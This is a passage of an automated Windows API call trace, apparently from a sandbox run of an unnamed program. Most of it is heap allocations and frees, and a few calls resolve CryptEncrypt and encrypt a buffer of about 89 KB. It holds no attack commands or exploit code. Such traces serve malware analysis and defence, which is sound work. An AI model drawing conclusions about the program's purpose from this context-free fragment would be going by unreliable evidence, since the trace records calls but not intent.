RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0260.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0260.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0260.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15bd9) returned 0x2eaaaf0 [0260.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaaaf0 | out: hHeap=0x970000) returned 1 [0260.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0260.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0260.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0260.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0260.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0260.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0260.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51ce8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0260.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0260.109] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0260.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0260.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0260.109] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94f08*, pdwDataLen=0x8cef60*=0x15bd9, dwBufLen=0x15be0 | out: pbData=0x2e94f08*, pdwDataLen=0x8cef60*=0x15be0) returned 1 [0260.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0260.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.409] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0260.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0260.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0260.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0260.409] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0260.410] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0260.410] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0260.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0260.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0260.411] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0260.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0260.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0260.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0260.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0260.411] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0260.412] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0260.412] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0260.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0260.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2eaaaf0 [0260.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2ed62c0 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaaaf0 | out: hHeap=0x970000) returned 1 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0260.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2eaaaf0 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed62c0 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2ed62c0 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaaaf0 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0260.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0260.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94f08 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0260.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0260.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0260.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0260.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0260.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0260.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0260.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec06d8 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0260.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: 